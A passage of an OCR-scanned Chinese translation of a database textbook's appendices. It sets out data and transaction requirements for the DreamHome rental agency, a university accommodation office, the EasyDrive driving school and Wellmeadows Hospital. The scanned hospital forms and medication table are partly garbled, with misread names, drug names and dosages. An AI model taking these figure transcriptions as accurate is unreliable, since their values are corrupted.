址 、 类 型 、 房 间 数 量 、 租 金 、 广 告 日 期 、 报 纸 名 字 和 费用 。 为 每 一 份 报纸 存储 的 数据 包括 报 
纸 名 字 、 地 址 、 电 话 号 码 和 联系 人 。 


A.1.2 事务 需求 (示例 ) 


数据 录入 
录入 一 个 新 分 公司 的 情况 (比如 格拉 斯 哥 市 的 分 公司 B003 )。 
录入 某 个 分 公司 中 一 名 新 员工 的 情况 (比如 分 公司 B003 的 Ann Beech )。 
录入 客户 和 房产 之 间 租 约 的 情况 (比如 客户 Mike Ritchie 租 下 编号 为 PG4 的 房产 ， 时 
间 从 2012 年 5 月 10 日 到 2013 年 5 月 9 日 )。 
录入 在 报纸 上 刊登 房产 广告 的 情况 (比如 编号 为 PG4 的 房产 的 广告 刊登 在 2012 年 5 月 
6 日 格拉 斯 哥 市 的 日 报 上 )。 
数据 更 新 / 删除 
更 新 /删除 某 分 公司 的 情况 。 
更 新 /删除 工作 在 某 分 公司 的 一 名 员工 的 情况 。 
更 新 /删除 给 定 分 公司 的 给 定 租约 的 情况 。 
更 新 /删除 给 定 分 公司 的 报纸 广告 的 情况 。 
数据 查询 
用 于 Branch 视图 查询 的 例子 如 下 所 示 : 
(a) 列 出 给 定 城市 所 有 分 公司 的 情况 。 
(b) 确定 每 个 城市 分 公司 的 总 数 。 
(c) 按 员工 的 名 字 顺 序 ， 列 出 给 定 分 公司 员工 的 名 字 、 职 务 和 工资 。 
(d) 确定 员工 的 总 数 和 他 们 工资 的 总 和 。 
(e) 确定 格拉 斯 哥 市 的 分 公司 中 每 一 职务 的 员工 人 数 。 
(f) 按 分 公司 的 地 址 顺序 ， 列 出 每 个 分 公司 中 每 名 经 理 的 名 字 。 
(g) 列 出 被 命名 为 主管 的 员工 的 名 字 。 
(h) 按 租金 的 多 少 ， 列 出 格拉 斯 哥 市 所 有 房产 的 编号 、 地 址 、 类 型 和 租金 。 
(i) 列 出 某 具 名 员工 管理 的 待 出 租房 产 的 情况 。 
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(j) 确定 某 分 公司 分 派 给 每 位 员工 的 房产 总 数 。 

(k) 列 出 某 分 公司 中 由 企业 业主 提供 的 房产 的 情况 。 

(1) 确定 所 有 分 公司 中 每 一 类 房产 的 总 数 。 

(m) 确定 提供 多 处 房产 出 租 的 私人 业主 的 情况 。 

(n) 确定 阿 伯 丁 市 中 至 少 带 有 3 个 房间 且 月 租 不 高 于 350 英镑 的 公寓 数目 。 
(0) 列 出 给 定 分 公司 中 客户 的 编号 、 名 字 、 电 话 号 码 和 他 们 喜欢 的 房产 类 型 。 
(p) 列 出 刊登 广告 次 数 多 于 平均 次 数 的 房产 。 

(q) 列 出 某 分 公司 到 下 个 月 期 满 的 租约 情况 。 

(r) 列 出 伦敦 市 分 公司 中 租 期 少 于 一 年 的 房产 的 总 数 。 

(s) 按 分 公司 编号 排列 ， 列 出 每 个 分 公司 每 天 出 租房 产 的 全 部 租金 收入 。 


A.2 DreamHome 的 Staff 用 户 视图 


A.2.1 数据 需求 
员工 

关于 员工 ， 需 要 存储 的 数据 包括 员工 编号 、 名 字 (名 和 姓 )、 职 务 、 性 别 、 出 生日 期 
(DOB) 和 主管 名 字 ( 若 存 在 的 话 )。 担 任 主管 工作 的 员工 负责 管理 本 组 其 他 助理 员工 的 日 常 
活动 (每 组 最 多 10 人 )。 
出 租 的 房产 

为 出 租 的 房产 存储 的 数据 包括 房产 编号 、 地 址 (街道 、 城 市 和 邮编 )、 类 型 、 房 间 数 量 、 
月 租金 和 业主 情况 。 房 产 的 月 租金 每 年 进行 一 次 复审 。DreamHome 中 用 于 出 租 的 房产 大 多 
数 是 公寓 。 每 处 房产 分 配给 一 位 员工 管理 ， 它 负责 处 理 房产 出 租 的 有 关 事宜 。 任 何 时 候 ， 一 
位 员工 管理 的 房产 数 最 多 不 超过 100 处 。 
业主 

业主 有 两 种 主要 类 型 : 私人 业主 和 企业 业主 。 为 私人 业主 存储 的 数据 包括 业主 编号 、 名 
字 (名 和 姓 )、 地 址 和 电话 号 码 。 为 企业 业主 存储 的 数据 包括 业主 编号 、 企 业 的 名 字 、 企 业 
的 类 型 、 地 址 、 电 话 号 码 和 联系 人 。 
客户 

当 潜 在 客户 注册 时 ，DreamHome 中 存储 的 数据 包括 客户 编号 、 名 字 ( 姓 和 名 )、 电 话 号 
码 及 所 需 房产 的 一 些 数据 ， 包 括 嘉 欢 的 住所 类 型 和 客户 最 多 准备 支付 的 租金 。 同 样 也 存储 负 
责 注 册 新 客户 的 员工 的 名 字 。 
看 房 

客户 可 能 要 求 看 房 。 此 时 ， 存 储 的 数据 包括 客户 编号 、 名 字 和 电话 号 码 、 房 产 编 号 和 地 
址 、 客 户 看 房 的 日 期 和 客户 对 房产 合适 与 否 所 做 的 任何 评论 。 客 户 在 一 个 日 期 只 能 查看 相同 
的 房产 一 次 。 
租约 

只 要 客户 发 现 合适 的 房产 ， 就 草拟 租约 。 租 约 信息 包括 租约 编号 、 客 户 编号 和 名 字 、 房 
产 编号 、 地 址 、 类 型 和 房间 数量 、 月 租 、 付 款 方法 、 定 金 (为 月 租 的 两 倍 )、 定 金 是 否 支付 、 
出 租 开 始 和 结束 的 日 期 和 租约 持续 时 间 。 租 约 编号 在 所 有 的 DreamHome 分 公司 内 都 是 唯一 
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的 。 一 个 客户 可 能 拥有 给 定 房产 租约 的 期 限 最 少 为 3 个 月 ， 最 多 为 1 年 。 


A.2.2 事务 需求 (示例 ) 
数据 录 人 

录入 待 租 新 房产 及 其 业主 的 情况 (例如 Tina Murphy 所 有 的 在 格拉 斯 哥 市 ， 编 号 为 PG4 
的 房产 情况 )。 

录入 一 名 新 客户 的 情况 (比如 Mike Ritchie 的 情况 ) 。 

录入 一 名 客户 查看 房产 的 情况 (比如 客户 Mike Ritchie 在 2012 年 5 月 6 日 查看 格拉 斯 
哥 市 编号 为 PG4 的 房产 )。 

录入 客户 对 房产 签 租 约 的 情况 (比如 客户 Mike Ritchie 租借 了 编号 为 PG4 的 房产 ， 时 间 
从 2012 年 5 月 10 日 到 2013 年 5 月 9 日 )。 
数据 更 新 / 删除 

更 新 /删除 一 处 房产 的 情况 。 

更 新 / 删除 一 名 业主 的 情况 。 

更 新 / 删除 一 名 客户 的 情况 。 

更 新 / 删除 一 名 客户 查看 过 的 一 处 房产 的 情况 。 

更 新 /删除 一 份 租约 的 情况 。 
数据 查询 

用 于 Staff 视图 查询 的 例子 如 下 所 示 : 

(a) 列 出 分 公司 被 任命 为 主管 的 员工 的 情况 。 

(b) 按 名 字 在 字母 表 中 的 顺序 列 出 所 有 助理 的 情况 。 

(c) 列 出 分 公司 可 供出 租 的 房产 的 情况 (包括 出 租 定金 )， 包 括 业 主 的 情况 。 

(d) 列 出 分 公司 中 由 某 名 员工 管理 的 房产 的 情况 。 

(e) 列 出 在 分 公司 注册 客户 的 情况 和 负责 注册 客户 的 员工 的 名 字 。 

(f) 确定 位 于 格拉 斯 哥 市 且 租 金 不 高 于 450 英镑 的 房产 的 数量 。 

(g) 确定 给 定 房产 的 业主 的 名 字 和 电话 号 码 。 

(h) 列 出 客户 查看 过 给 定 房产 后 所 做 的 评论 情况 。 

(i) 列 出 查看 过 给 定 房产 但 没有 做 出 评论 的 客户 的 名 字 和 电话 号 码 。 

(j) 列 出 某 客户 与 给 定 房产 之 间 租 约 的 情况 。 

(k) 确定 分 公司 到 下 个 月 期 满 的 租约 的 数量 。 

(1) 列 出 出 租 不 超过 三 个 月 的 房产 的 情况 。 

(m) 生成 喜欢 特定 房产 类 型 的 客户 的 列表 。 
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其 他 案例 研究 








本 附录 我 们 主要 学 习 : 

@ 大 学 住宿 管理 处 (University Accommodation Office) 案例 研究 ， 它 描述 了 大 学 住宿 
管理 处 的 数据 需求 和 事务 需求 

e 易 驾 驾校 (EasyDrive School of Motoring) 案例 研究 ， 它 描述 了 驾驶 学 校 的 数据 需求 
和 事务 需求 

e Wellmeadows 医院 案例 研究 ， 它 描述 了 医院 的 数据 需求 和 事务 需求 


附录 B.1 节 描 述 大 学 住宿 管理 处 案例 研究 ，B.2 节 描 述 易 驾 驾校 案例 研究 ，B.3 节 描 述 
Wellmeadows 医院 案例 研究 。 


B.1 大 学 住宿 管理 处 案例 研究 


大 学 住宿 管理 处 主任 希望 设计 一 个 数据 库 来 帮助 进行 管理 工作 。 通 过 数据 库 设计 过 程 中 
需求 收集 和 分 析 阶 段 的 工作 ， 提 出 如 下 关于 大 学 住宿 管理 处 数据 库 系统 的 数据 需求 说 明 ， 以 
及 该 数据 库 能 支持 的 查询 事务 的 示例 。 


B.1.1 数据 需求 
学 生 

为 每 位 全 日 制 学 生存 储 的 数据 包括 : 学 号 、 名 字 (名 和 姓 )、 家 庭 地 址 (街道 、 城 市 、 邮 
编 )、 手 机 号 、 电 子 邮箱 号 、 出 生日 期 、 性 别 、 学 生 类 别 (例如 ， 大 学 一 年 级 学 生 或 研究 生 )、 
国籍 、 特 殊 需 求 、 任 何 附加 备注 、 当 前 状况 (已 安排 或 处 于 等 待 中 )、 专 业 和 辅修 科目 。 

存储 的 学 生 信息 与 该 学 生 是 已 租房 还 是 正在 等 待 队 列 等 待 有 关 。 学 生 可 能 租 住 集体 宿舍 
或 学 生 公寓 。 

当 学 生 进入 大 学 时 ， 就 会 指派 一 名 教员 工 充当 他 的 指导 教师 。 指 导 教 师 的 作用 就 是 保证 
学 生 在 校 期 间 的 福利 ， 并 监督 他 们 的 学 业 。 为 指导 教师 存储 的 数据 包括 全 名 、 职 位 、 部 门 名 
称 、 内 部 电话 、 电 子 邮 箱 号 和 房间 号 。 
集体 宿舍 

每 座 集 体 宿舍 有 名 字 、 地 址 、 电 话 号 码 和 管理 宿舍 业务 的 管理 员 。 宿 舍 只 提供 单间 ， 具 
有 房间 号 、 床 位 号 和 月 租金 。 

床位 号 唯一 标识 由 住宿 管理 处 管理 着 的 每 个 房间 ， 并 且 仅 当 房 间 租 给 一 个 学 生 时 才 
启用 。 
学 生 公寓 

住宿 管理 处 也 可 以 提供 学 生 公寓 。 这 些 公寓 装修 良好 ， 可 以 提供 一 套房 间 给 三 名 、 四 名 


府 录 B 其 他 壬 合 研 和 424 


或 五 名 学 生 合 住 。 学 生 公寓 存储 的 信息 包括 公寓 号 、 地 址 和 每 套 公寓 可 用 的 卧室 数目 。 公 寓 
号 唯一 地 标识 每 座 公寓 。 

公寓 中 的 每 个 卧室 有 月 租金 、 房 间 号 和 床位 号 。 床 位 号 唯一 标识 整个 学 生 公寓 中 每 个 可 
用 的 房间 ， 并 且 仅 当 房间 租 给 一 个 学 生 时 才 启 用 。 
租约 

学 生 可 以 在 不 同 的 时 间 段 租用 集体 宿舍 或 学 生 公寓 的 房间 。 新 租约 协定 从 每 一 学 年 开 
始 ， 最 短 租 期 为 一 学 期 ; 最 长 租 期 为 一 年 ， 包 括 两 个 长 学 期 和 夏季 学 期 。 学 生 和 住宿 管理 处 
之 间 的 个 人 租约 协议 可 由 租约 号 唯一 标识 。 

每 个 租约 存储 的 数据 包括 租约 号 、 租 约 持 续 时 间 (以 学 期 为 单位 )、 学 生 名 字 和 入 学 号 、 
床位 号 、 房 间 号 、 集 体 宿舍 或 学 生 公寓 地 址 情况 、 学 生 打 算 入 住房 间 的 日 期 和 学 生 打 算 退 房 
的 日 期 (如 果 能 确定 )。 
账单 

每 学 期 开始 ， 每 个 学 生 收 到 一 张 关 于 下 一 租用 期 的 账单 。 每 张 账单 有 唯一 的 账单 号 。 

每 张 账单 存储 的 数据 包括 账单 号 、 租 约 号 、 学 期 、 支 付 期 限 、 学 生 全 名 和 人 和 人 学 号 、 床 位 
号 、 房 间 号 和 集体 宿舍 或 学 生 公寓 的 地 址 。 账 单 上 还 有 一 些 关于 付款 的 数据 ， 包 括 账单 支付 
的 日 期 、 支 付 方法 (支票 、 现 金 、 信 用 卡 等 )， 以 及 催 询 单 第 一 次 和 第 二 次 送 到 的 日 期 (如 果 
必要 的 话 )。 

学 生 公 寓 检 查 

学 生 公寓 由 员工 定期 检查 以 确保 住宿 条 件 良 好 。 每 次 检查 记录 的 信息 包括 执行 检查 的 员 
工 编号 、 检 查 的 日 期 、 房 间 是 否 处 于 满意 状况 的 标识 (是 或 不 是 ) 和 附加 的 评论 。 
住宿 管理 处 员工 

关于 工作 在 住宿 管理 处 的 员工 ， 存 储 的 信息 包括 员工 编号 、 名 字 ( 姓 和 名 )、 电 子 邮 箱 
号 、 家 庭 地 址 (街道 、 城 市 、 邮 编 )、 出 生日 期 、 性 别 、 职 务 ( 公 帘 经 理 、 行 政 助 理 、 清 洁 
工 ) 和 办 公 地 点 (例如 ,住宿 管理 处 或 宿舍 )。 
课程 

住宿 管理 处 也 存储 大 学 所 开课 程 的 有 限 信息 ， 包 括 课程 编号 、 课 程 名 称 (包括 学 年 )、 
授课 人、 授课 人 的 校内 电话 、 电 子 邮 箱 号 、 房 间 号 和 系 名 。 每 名 学 生 与 一 个 教程 关联 。 
家 属 

可 能 的 情况 下 ， 也 要 存储 学 生 家 属 的 一 些 信息 ， 包 括 名 字 、 与 学 生 的 关系 、 地 址 〈 街 
道 、 城 市 、 邮 编 ) 和 联系 电话 。 


B.1.2 ”查询 事务 (示例 ) 


下 面 给 出 大 学 住宿 管理 处 数据 库 系 统 应 支持 的 查询 事务 的 一 些 示例 : 
(a) 列 出 每 一 个 集体 宿舍 的 经 理 的 姓名 和 电话 号 码 。 

(b) 给 出 所 有 租约 一 览 表 ， 包 括 学 生 的 名 字 和 学 号 以 及 租约 细节 。 
(c) 显示 夏季 学 期 的 租约 情况 。 

(d) 显示 指定 学 生 支 付 租金 的 全 部 情况 。 

(e) 给 出 某 日 期 前 未 支付 租金 的 学 生 的 一 览 表 。 
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(f) 显示 公寓 检查 处 于 不 满意 状况 的 公寓 的 情况 。 

(g) 提交 住 在 某 一 集体 宿舍 中 学 生 的 名 字 、 学 号 、 房 间 号 和 床位 号 的 一 览 表 。 

(h) 给 出 当前 所 有 等 待 住宿 的 学 生 ， 即 尚未 安置 住宿 的 学 生 的 列表 。 

(i) 显示 每 类 学 生 的 总 人 数 。 

(j) 给 出 所 有 未 提供 家 属 情况 的 学 生 的 名 字 和 学 号 的 列表 。 

(k) 显示 指定 学 生 的 顾问 的 名 字 和 校内 电话 。 

(1) 显示 集体 宿舍 房租 的 最 小 值 、 最 大 值 和 平均 值 。 

(m) 显示 每 处 学 生 公 寓 中 床位 的 总 数 。 

(n) 显示 所 有 年 龄 超过 60 周岁 的 住宿 管理 处 员工 的 员工 编号 、 名 字 、 年 龄 和 当前 办 公 地 点 。 


B.2 易 驾 驾校 案例 研究 


易 驾 驾校 1992 年 始 建 于 格拉 斯 哥 市 。 从 那 时 起 ， 学 校规 模 稳 定 增长 ， 现 已 有 若干 分 校 
遍布 于 苏格兰 的 各 主要 城市 。 可 是 ， 驾 校规 模 增长 如 此 之 快 ， 以 至 于 需要 越 来 越 多 的 行政 人 
员 来 处 理 日 益 增 长 的 文书 工作 。 而 且 ， 各 分 校 之 间 ， 甚 至 处 在 同一 个 城市 的 分 校 之 间 信 息 的 
交流 和 共享 都 非常 匮乏 。 驾 校 的 校长 Dave MacLeod 认为 ， 如 果 不 改善 这 种 状况 就 会 有 越 来 
越 多 的 错误 发 生 ， 而 且 驾 校 的 生命 力也 不 强 。 他 知道 数据 库 能 帮助 解决 部 分 问题 ， 所 以 希望 
创建 数据 库 系统 以 支持 易 驾 驾校 的 运行 。 关 于 易 驾 驾校 系统 应 如 何 操作 ， 校 长 提供 了 下 面 的 
简单 描述 。 


B.2.1 数据 需求 


每 个 分 校 配 有 一 名 校长 (他 一 般 也 是 高 级 教练 )、 几 位 高 级 教练 、 教 练 和 若干 行政 人 员 。 
分 校 校 长 负责 该 分 校 每 天 的 运营 情况 。 驾 校 学 员 必 须 首先 在 学 校 登 记 ， 登 记 时 要 求 填 好 申请 
表 ， 记 录 个 人 情况 。 第 一 次 上 课 前 ， 学 员 必须 参加 由 教练 组 织 的 面试 ， 以 获取 该 学 员 的 特殊 
需求 ， 并 了 解 其 是 否 已 持 有 有 效 的 临时 驾驶 执照 。 驾 校 学 员 在 学 习 驾 驶 的 过 程 中 ， 可 以 自由 
指定 教练 或 请 求 更 换 教 练 。 面 试 以 后 ， 预 约 第 一 节 课 ， 学 员 可 以 要 求 上 单 人 班 或 费用 较 少 的 
多 人 班 。 单 人 班 每 次 一 小 时 ， 以 到 学 校 的 时 间 开始 计时 ， 离 开学 校 时 结束 计时 。 一 节 课 在 定 
长 的 时 间 内 ， 有 指定 的 教练 和 专车 。 所 有 课 最 早上 午 8 点 开始 ， 最 晚 下 午 8 点 结束 。 一 节 课 
后 ， 教 练 记 录 学 员 的 学 习 情 况 和 课堂 上 行驶 的 英里 数 。 学 校 有 很 多 车 ， 主 要 用 来 教学 ， 每 个 
教练 被 分 配 到 指定 的 车 上 。 除 用 于 教学 外 ， 教 练 个 人 可 以 免费 使 用 这 些 车 辆 。 驾 校 学 员 完 成 
了 全 部 课程 后 ， 就 可 以 申请 驾驶 测试 的 日 期 。 为 了 取得 驾驶 执照 ， 驾 校 学 员 必 须 通过 实践 和 
理论 两 部 分 测试 。 教 练 的 责任 是 确保 驾校 学 员 对 测试 进行 充分 的 准备 ， 但 不 负责 测试 学 员 ， 
而 且 测 试 时 不 能 待 在 车 上 , 但 是 教练 应 该 在 测试 中 心 接送 驾校 学 员 。 如 果 驾 校 学 员 未 能 通过 
考试 ， 教练 必须 记录 未 通过 考试 的 原因 。 


B.2.2 ”查询 事务 (示例 ) 


校长 提供 了 易 驾 驾校 数据 库 系 统 中 必须 支持 的 一 些 典型 查询 的 例子 : 
(a) 所 有 分 校 校 长 的 名 字 和 电话 号 码 。 

(b) 位 于 格拉 斯 哥 市 的 所 有 分 校 的 地 址 。 

(c) 在 格拉 斯 哥 市 的 贝尔 斯 登 分 校 工作 的 所 有 女 教 练 的 名 字 。 

(d) 每 个 分 校 的 员工 总 数 。 
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(e) 每 个 城市 中 驾校 学 员 (过 去 和 现在 ) 的 总 数 。 

(f) 下 周 某 个 教练 预约 的 时 间 表 。 

(g) 某 教 练 进行 面试 的 情况 。 

(h) 格拉 斯 哥 市 贝尔 斯 登 分 校 男女 学 员 的 总 人 数 。 

(i) 年 龄 超过 55 周岁 且 担 任教 练 的 员工 的 人 数 和 名 字 。 

(j) 没有 发 生 故 障 的 汽车 的 牌照 号 。 

(k) 由 格拉 斯 哥 市 贝尔 斯 登 分 校 的 教练 所 使 用 汽车 的 牌照 号 。 
(1) 2013 年 1 月 通过 汽车 驾驶 测试 的 驾校 学 员 名 单 。 

(m) 参加 三 次 以 上 驾驶 测试 仍 没有 通过 的 驾校 学 员 的 名 单 。 
(n) 一 小 时 课程 驾驶 的 平均 英里 数 。 

(0) 每 个 分 校 的 行政 人 员 的 数目 。 


B.3 Wellmeadows 医院 案例 研究 


本 案例 研究 描述 了 一 个 位 于 爱丁堡 的 名 为 Wellmeadows 的 小 型 医院 。Wellmeadows 医 
院 擅 长 于 老年 人 的 健康 护理 。 下 面 是 医院 员工 记录 、 维 护 和 访问 的 数据 的 描述 ， 用 于 支持 
Wellmeadows 医院 的 日 常 管理 和 操作 。 


B.3.1 数据 需求 


病房 

Wellmeadows 医院 有 17 间 病 房 ， 共 有 240 个 病床 用 于 短期 和 长 期 住院 的 病人 ， 还 有 一 
个 门诊 部 。 每 个 病房 可 以 用 病房 号 (例如 ， 病 房 11 ) 唯一 标识 ， 此 外 还 有 病房 名 字 (例如 ， 
牙科 )、 位 置 (例如 ，E 区 )、 病 床 总 数 和 电话 分 机 号 (例如 ,分 机 7711 )。 
员工 

Wellmeadows 医院 有 一 名 医务 主任 ， 负 责 医院 的 全 面 管理 。 他 完全 控制 医院 资源 的 使 用 
(包括 医护 人 员 、 病 床 、 供 给 药品 ) 以 对 所 在 病人 进行 经 济 的 治疗 。 

Wellmeadows 医院 有 一 名 人 事 部 主任 ,负责 把 合适 数量 和 类 型 的 员工 分 配 到 每 个 病房 和 
门诊 部 。 为 每 个 员工 存储 的 信息 包括 员工 编号 、 名 字 ( 姓 和 名 )、 详 细 地 址 、 电 话 号 码 、 出 
生日 期 、 性 别 、 国 家 保险 号 、 职 务 、 当 前 工资 和 工资 级 别 。 同 时 ， 还 包括 每 位 员工 的 资格 证 
(包括 发 证 日 期 、 类 型 和 发 证 机 构 ) 和 工作 经 历 (包括 组 织 名 字 、 职 务 、 开 始 和 结束 日 期 )。 

每 个 员工 雇用 合同 类 型 也 需要 记录 ， 包 括 每 周 工作 的 小 时 数 、 员 工 是 专职 还 是 兼职 、 
支付 工资 的 类 型 ( 按 周 / 按 月 )。 例 如 ，Wellmeadows 医院 在 11 号 病房 工作 的 员工 Moira 
Samuel 的 登记 表 如 图 B-1 所 示 。 

每 个 病房 和 门诊 部 都 有 一 位 担任 护士 长 的 员工 。 护 士 长 负责 查看 病房 和 门诊 部 每 天 的 运 
行情 况 。 护 士 长 对 病房 进行 预算 ， 必 须 确 保 所 有 资源 (员工 、 病 床 和 供给 药品 ) 在 病人 护理 
时 得 到 高 效 使 用 。 医 务 主任 的 工作 和 护士 长 紧密 相连 以 确保 整个 医院 的 高 效 运 作 。 

护士 长 负责 安排 周 值班 表 ， 必 须 确保 病房 和 门诊 部 无 论 在 任何 时 间 都 有 合适 数量 和 类 型 
的 员工 在 值班 。 一 周 内 ， 每 位 员工 轮流 值 早 、 中 或 晚 班 。 

和 护士 长 一 样 ， 每 个 病房 分 配 中 级 和 初级 护士 、 医 生 和 辅助 人 员 。 专 业 员 工 (例如 ， 咨 
询 人 员 和 理疗 人 员 ) 也 被 分 配给 一 些 病房 或 门诊 部 。 例 如 ，Wellmeadows 医院 分 配给 11 号 
病房 的 员工 的 详细 情况 一 览 表 如 图 B-2 所 示 。 





Wellmeadows Hospital 
Staff Form | 
Staff Number: son 


First Name Moira 


Address 49 School Road 
Broxburn 


Tel. No. 01506-45655 


Position Charge Nurse 
Current Salary 18,760 


Salary Scale 1C scale 
‘Paid Weekly or 


Monthly 
(Enter W or M) M 


Type Ee bu Studies 
Date 人 Juker 


nstitution Edinburgh University 


Last Name Samuel 


~ Sex Female 


Date of Birth 30-May-61 
Insurance | 
Number WB125423D 


Allocated 11 
to Ward 


Hours/Week 375 
Permanent or 


Temporary 
(Enter PorT) F 


Position Staff Nurse 


Start Date 25-Jan-90 


Finish Date _1-May-93 
Organization Western Hospital 


Note: Please enter additional qualifications/work experience on reverse. 





图 B-1 Wellmeadows 医院 员工 登记 表 


Wellmeadows Hospital Week 
Ward Staff Allocation beginning 12-Jan-14 


"Ward Number Ward 二 Charge Nurse Molra Samuel 


Ward Name Onhopaede Staff Number 5ol 


La BlockE Tel Extn. 7711 





图 B-2 ”Wellmeadows 医院 病房 员工 一 览 表 的 第 一 页 
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病人 

病人 一 且 进 入 医院 ， 就 会 分 配 到 唯一 的 病人 号 。 同 时 ， 病 人 的 其 他 信息 也 要 记录 ， 包 
括 名 字 〈 姓 和 名 )、 地 址 、 电 话 号 码 、 出 生日 期 、 性 别 、 婚 姻 状 况 、 住 院 日 期 和 病人 家 属 的 
情况 。 
病人 家 属 

病人 家 属 的 情况 需要 记录 ， 包 括 家 属 的 全 名 、 和 病人 的 关系 、 地 址 、 电 话 号 码 。 
社区 医生 


病人 通常 由 社区 医生 送 到 医院 。 社 区 医生 的 情况 需要 记录 ， 包 括 他 们 的 全 名 、 诊 所 号 、 
地 址 和 电话 号 码 。 诊 所 号 在 全 英国 是 唯一 的 。Wellmeadows 医院 用 于 记录 病人 Anne Phelps 
详细 情况 的 登记 表 如 图 B-3 所 示 。 





图 B-3 Wellmeadows 医院 病人 登记 表 


病人 约 查 
病人 被 他 的 社区 医生 送 到 Wellmeadows 医院 后 ， 就 会 预约 一 次 由 医院 咨询 专家 进行 的 
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检查 。 每 次 约 查 都 有 唯一 的 约 查 号 。 记 录 每 名 病人 约 查 的 情况 ， 包 括 进行 此 次 检查 的 专家 的 
名 字 和 员工 编号 、 约 查 日 期 和 时 间 及 约 查 房间 (例如 ， 房 间 E252 ) 。 

检查 结果 将 确定 病人 是 送 到 门诊 就 诊 还 是 住院 就 诊 。 
门诊 病人 

门诊 病人 的 情况 需要 存储 ， 包 括 病人 号 、 名 字 ( 姓 和 名 )、 地 址 、 电 话 号 码 、 出 生日 期 、 
性 别 、 在 门诊 部 约 诊 的 日 期 和 时 间 。 
住院 病人 

护士 长 和 其 他 高 级 医护 人 员 负 责 为 病人 分 配 病床 。 当 前 已 安置 在 病房 和 在 等 待 安置 的 
病人 情况 需要 记录 ， 包 括 病人 号 、 名 字 ( 姓 和 名 )、 地 址 、 电 话 号 码 、 出 生日 期 、 性 别 、 婚 
姻 状 况 、 病 人 家 属 的 情况 、 放 置 在 等 待 队 列 中 的 日 期 、 所 需 的 病房 、 希 望 住院 的 时 间 ( 按 天 
计 )、 住 院 日 期 、 出 院 日 期 和 实际 出 院 日 期 ( 若 能 确定 的 话 )。 

病人 住 进 病房 时 ， 被 分 配 一 个 病床 且 具 有 唯一 的 病床 号 。 被 分 配 到 11 号 病房 的 病人 的 
详细 情况 一 览 表 如 图 B-4 所 示 。 





图 B-4 Wellmeadows 医院 某 病房 病人 一 览 表 的 第 一 页 


病人 的 药方 

给 病人 开 药 时 ， 有 关 情 况 需 要 记录 ， 包 括 病人 名 字 和 病人 号 、 药 品 数量 和 名 称 、 每 天 
服用 的 次 数 、 服 用 方法 (例如, 口服、 静脉 注射 )、 开 始 和 结束 的 日 期 。 给 每 位 病人 的 药品 
应 得 到 控制 。Wellmeadows 医院 用 于 记录 病人 Robert MacDonald 的 用 药 情 况 表 如 图 B-5 
所 示 。 
治疗 品 和 非 治疗 品 供应 

Wellmeadows 医院 有 一 个 治疗 〈 例 如 ， 注 射 器 、 消 毒剂 ) 和 非 治疗 〈 例 如 ， 塑 料 袋 、 围 
裙 ) 医疗 用 品 的 中 心 库 。 医 疗 用 品 的 信息 包括 物品 号 和 名 字 、 物 品 说 明 书 、 库 存 数量 、 再 订 
购 级 别 和 单价 。 用 品 号 可 以 唯一 标识 每 类 治疗 用 和 非 治疗 用 医疗 物品 。 每 个 病房 所 用 医疗 用 
品 都 会 得 到 监控 。 
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Wellmeadows Hospital 
Patient Medication Form 


Patient Number: P10034 





Ward Number Wardi1i! 
Ward Name Orthopacdic 


we Description | Dosage pr tt Units en Sn 
per Day 


oy killer | 10mg/ml CE: 24-Mar-14 | 24-Apr-14 
oo ad O5malml 24-Mar-14 | 17-Apr-14 
orphine oe 10mg/ml 25-Apr-14 | 2-May-14 


图 B-5 Wellmeadows 医院 病人 用 药 情 况 表 


Full Name Robert MacDorald 
Bed Number 84 














药物 供应 

医院 也 有 一 个 药品 供应 库 (例如 ,抗生素 、 止 痛 药 )。 药 品 供应 的 情况 包括 药品 号 和 名 
字 、 说 明 书 、 用 量 、 服 用 方法 、 库 存 数量 、 再 订购 级 别 和 单价 。 药 品 号 可 以 唯一 标识 每 类 药 
品 。 每 个 病房 所 用 的 药品 都 会 得 到 控制 。 
病房 申请 表 

需要 时 ， 护 士 长 可 以 从 医院 的 中 心 库房 取 到 治疗 、 非 治疗 用 品 。 这 些 用 品 是 用 申请 表 按 
订货 的 顺序 供应 给 病房 的 。 申 请 表 的 信息 包括 唯一 的 申请 表 号 、 提 交 申 请 的 员工 名 字 、 病 房 
号 和 病房 名 字 。 它 也 包括 物品 或 药品 号 、 名 字 、 说 明 书 、 用 量 、 服 用 方法 (只 对 药品 )、 单 
价 、 所 需 数量 和 订单 日 期 。 申 请 的 供应 品 被 送 到 病房 时 ， 申 请 表 由 护士 长 签名 并 标明 日 期 。 
Wellmeadows 医院 11 号 病房 用 于 订购 药品 的 申请 表 如 图 B-6 所 示 。 


Wellmeadows Hospital 
Central Store 
Requisition Form 


Requlsition Namer -934567712 
Ward Number Ward1l Requisitioned By Moira Samuel 
Ward Name Orthopaedic Requisition Date 15-Feb-14 


al 
人 Only) ri 





图 B-6 Wellmeadows 医院 病房 申请 表 
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供应 商 
治疗 、 非 治疗 用 品 供应 商 的 信息 也 需要 存储 ， 包 括 供应 商 的 名 字 和 编号 、 地 址 、 电 话 号 
码 和 传真 号 码 。 供 应 商 编号 能 唯一 标识 每 个 供应 商 。 


B.3.2 事务 需求 (示例 ) 


运行 下 列 事务 可 以 获得 适当 的 信息 ， 用 于 员工 管理 和 查看 Wellmeadows 医院 每 天 的 运 
营 情 况 。 每 项 事务 都 和 医院 特定 的 工作 联系 在 一 起 。 这 些 工 作 由 一 定 级 别 (位 置 ) 的 员工 负 
责 。 每 项 事务 的 主要 用 户 或 用 户 组 写 在 每 项 事务 描述 最 后 的 括号 里 。 

(a) 创建 和 维护 所 有 员工 情况 的 记录 (人 事 部 主任 )。 

(b) 查找 具有 特殊 资格 证 或 有 一 定 工作 经 验 的 员工 (人事 部 主任 )。 

(c) 产生 一 个 报表 ， 列 出 分 配 到 每 个 病房 的 员工 的 情况 (人 事 部 主任 和 护士 长 )。 

(d) 创建 和 维护 送 到 住院 部 的 病人 情况 的 记录 (所 有 员工 )。 

(e) 创建 和 维护 送 到 门诊 部 的 病人 情况 的 记录 (护士 长 )。 

(f) 产生 一 个 报表 ， 列 出 送 到 门诊 部 的 病人 的 情况 (护士 长 和 医务 主任 )。 

(g) 创建 和 维护 送 到 特定 病房 的 病人 情况 的 记录 (护士 长 )。 

(h) 产生 一 个 报表 ， 列 出 当前 在 特定 病房 的 病人 的 情况 (护士 长 和 医务 主任 )。 

(i) 产生 一 个 报表 ， 列 出 当前 在 等 待人 住 特定 病房 的 病人 的 情况 (护士 长 和 医务 主任 )。 

(j ) 创建 和 维护 给 特定 病人 所 开 药方 情况 的 记录 (护士 长 )。 

